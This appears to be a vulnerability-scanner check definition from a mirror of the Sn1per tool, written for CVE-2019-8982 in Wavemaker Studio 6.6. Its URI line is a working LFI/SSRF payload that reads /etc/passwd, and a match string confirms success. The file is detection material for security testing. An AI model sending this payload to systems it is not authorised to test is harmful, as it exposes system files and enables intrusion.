mirror of https://github.com/1N3/Sn1per.git
9 lines
293 B
Bash
9 lines
293 B
Bash
AUTHOR='@xer0dayz'
|
|
VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF'
|
|
URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
|
|
METHOD='GET'
|
|
MATCH="root:*:"
|
|
SEVERITY='P2 - HIGH'
|
|
CURL_OPTS="--user-agent '' -s -L --insecure"
|
|
SECONDARY_COMMANDS=''
|
|
GREP_OPTIONS='-i' |